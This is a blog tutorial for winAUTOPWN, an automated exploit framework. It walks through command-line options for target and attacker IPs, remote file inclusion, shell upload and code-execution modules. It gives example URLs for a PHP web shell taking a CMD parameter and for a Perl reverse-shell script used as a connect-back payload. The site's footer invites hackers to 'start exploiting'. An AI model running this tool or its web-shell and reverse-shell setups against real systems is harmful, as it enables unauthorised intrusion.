winAUTOPWN Tutorial

10:54 am , 0 comments
winAUTOPWN Vulnerability scanner


 For x86 release, perform the below
chmod +x bsdAUTOPWN
./bsdAUTOPWN
For x64 release, perform the below
chmod +x bsdAUTOPWN.x64
./bsdAUTOPWN.x64
For DFLY SVR4 release, perform the below
chmod +x bsdAUTOPWN.dfly.SVR4
./bsdAUTOPWN.dfly.SVR4
BSD AUTOPWN won’t run on Linux platforms directly. BSD AUTOPWN is the smallest and fastest Systems Exploit Framework available for FreeBSD systems.
How to use winAUTOPWN?

Since winAUTOPWN relies on freely available exploits written in many languages, scripting languages like Perl, PHP and Python are required to be present on the system where winAUTOPWN will be used. A few exploits which are available and/or written in C, C#, Java or other compiler based languages are pre-compiled and readily made available.
winAUTOPWN has an intuitive console which takes the following inputs :
  1. Target Host IP address – Enter the system on which you want to test exploits
  2. Target Hostname – Enter the Target System’s hostname / DNS Name
  3. Attacker’s IP address – Enter your IP address for connect back and a few exploits.
There are other options too which are required if you intend to test Web Application Vulnerability exploits using winAUTOPWN, these are:
  1. Target CMS Path – Enter the Content Management System path. This is generally the very first folder name which is seen right after the domain name. Example : If the URL is http://www.somewebsite.com/application1/test.php then the CMS Path is /application1
  2. Actual CMS Path – This is the actual path of the CMS hosted on the Target Server. Example : /opt/share/www OR /opt/lampp/htdocs/logicx/tmp/agora
By default, due to the large number of Remote File Inclusion and Remote Shell Upload and Remote Command Execution based vulnerabilities available in winAUTOPWN exploit repository, the options to test these are set to OFF by default. To enable them start winAUTOPWN with the arguments:
winAUTOPWN –doRSHto force Remote Shell Upload Web-app Vulnerability Module.
winAUTOPWN -doRFI to force Remote File Inclusion Web-app Vulnerability Scan Module.
winAUTOPWN -doRCE to force Remote Code Execution Web-app Vulnerability Scan Module.
  1. Interactive PHP Shell Path – This is the path of the PHP web-shell path to be used along with Remote File Inclusion exploits. There is always a default encoded path. Your path should look something like: http://somewebsite/r57.txt
    This is optional but is essential for RFI Exploits.
  2. CMS Administrator Username – This is the username of the CMS Admin if known to the attacker. This is optional but essential in certain privilege escalation exploits, where the web-app can be used to gain full control over the server.
  3. FTP/CMS Username – This one the username of the FTP / CMS Server if known to the attacker.
  4. FTP/CMS Password – This one is the password of the FTP / CMS Server if known to the attacker.
  5. Proxy IP – This is the Proxy IP address which can be used in a few exploits which support this feature.
  6. Proxy Port – This is the Proxy Port which the attacker can use in a few exploits which support this feature.
Note that winAUTOPWN will test these and all other port 80 based exploits after finishing checks for exploits of all other ports.
winAUTOPWN has a Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:
Example of a filled winAUTOPWN GUI which will pass on the arguments to the console :
You will notice in the screenshot above a parameter called MAXTHREADS. Any operating system has a limit to number of connections which can be made to an IP at a time. This is true to the IP address to which we are connecting as well. The portscan module in-built inside winAUTOPWN changes the threads according to the IP address. If the IP address is a private in nature like 10.x.x.x or 192.168.x.x then it sets 100 threads as default. It is set lower if the IP address is a public IP.
This can be overridden with the MAXTHREADS option if the user wishes to do so in conditions where public IP addresses are used in a Local private LAN. This might also be helpful in a scenario where you want to do an extremely slow portscan.
Use the MAXTHREADS xx parameter as shown above winAUTOPWN.exe MAXTHREADS 20 to set number of threads, in this case 20.
How to use command-line in winAUTOPWN ?

Command-line usage has always been a mark of a power user in any console based penetration testing tool. winAUTOPWN’s entire interactive interface can be pre-fed with values using command line options as explained below :
  • -skipscan This option can force winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is a useful feature when you know what open ports are available on your target system. One can just fill in the port numbers and save the file. This is also helpful in situations when you want winAUTOPWN to check for exploits for one or a few particular ports.
    Example winAUTOPWN.exe –skipscan
  • -onlyscan This option can force winAUTOPWN to skip the entire exploit testing modules. Hence, by using this module winAUTOPWN will only perform a PortScan and will exit after printing the list of OpenPorts .
    Example winAUTOPWN.exe –onlyscan
  • -targetIP This option can be used to provide the Target IP address of the system being tested. Ensure that you specify the IP address after it.
    Example winAUTOPWN.exe –targetIP 192.168.3.3
  • -targetHOST This option can be used to provide the Target Hostname of the system being tested. Ensure that you specify the complete Netbios name for Windows systems on LAN and the entire domain name for Target Systems on WAN.
    Example winAUTOPWN.exe –targetHOST SYSTEM-2
    winAUTOPWN.exe –targetHOST www.somewebsite9.com
  • -attackerIP This option can be used to provide your own IP, which is the Attacker’s IP address of the system from where winAUTOPWN is being run. Ensure that you specify the IP address after it.
    Example winAUTOPWN.exe –attackerIP 192.168.3.34
  • -cmsPATH This option can be used to specify the Content Management System directory name in the URL. Generally this is the first directory name right after the end of the Domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –cmsPATH /xampp
  • -actcmsPATH This option can be used to specify the Actual Content Management System or the internal Actual CMS Path of the URL. Generally this is not visible in the URL. A lot of times CMS packages installed on the webserver have a default path making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –actcmsPATH /Applications/xampp
    winAUTOPWN.exe –actcmsPATH /opt/xampp
  • -phpshellPATH This option can be used specify the path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH which accepts a variable named CMD to execute system commands. The GET request should look like http://shellp.ath/shell.php?CMD=ls
    You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt
  • -actphpshellPATH This option can be used specify the actual internal path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –actphpshellPATH /var/log/tmp
  • -cmsadminUSR This option can be used specify the administrator /admin username if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –cmsadminUSR admin9
  • -ftpUSR This option can be used specify the FTP User name if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Username.
    Example winAUTOPWN.exe –ftpUSR user6
  • -ftpPASSWD This option can be used specify the FTP Password if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Password.
    Example winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD
  • -perlrevshURL This option can be used specify the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally have the capability to be invoked as perl <remote_ip> <remote_port>. Note that the remote_IP will be your IP to which your target will connect and the remote_port will be a port opened on your IP. You do not have to worry about providing parameters to the Perl file or opening the port locally, winAUTOPWN will automatically handle it, because that’s what WINDOWS AUTOPWN actually means. Also note that any Perl script with these capabilities can be used and can be hosted on any webserver. This option just needs the path to this Perl file. This Perl script will be pointed to and used in a few exploits in which a remote connect back shell is used as a payload. There is a default Perl shell path encoded so if you have no clue or an online resource, you can leave this option blank and winAUTOPWN will try to handle it on its own.
    Example winAUTOPWN.exe –perlrevshURL http://website.moc/various/reverse-shell.pl
  • -mailFROM This option can be used to specify the sender’s email address to be used in a few SMTP exploits. This field has a default sender’s email address crafted by winAUTOPWN. It is alwaysroot@<target_hostname> where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
    Example winAUTOPWN.exe –mailFROM admin@some.web.info
  • -mailTO This option can be used specify the receiver’s email address to be used in a few SMTP Exploits. This field has a default receiver’s email address crafted by winAUTOPWN. It is alwayspostmaster@<target_hostname> where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
    Example winAUTOPWN.exe –mailTO postmaster@some.web.info
  • -proxyIP This option can be used to provide the Proxy Server IP address. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it. 
    Example winAUTOPWN.exe –proxyIP 192.168.3.80
  • -proxyPORT This option can be used to provide the Proxy Server Port Number. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy Port Number address after it. 
    Example winAUTOPWN.exe –proxyIP 8080


    Download winAUTOPWN here

About the Author

Written by Admin

Chennai hackers connect is a branch of Computer maniac.It is the platform for the HACKERS to connect and start exploiting.


0 comments:

Subscribe to: Post Comments (Atom)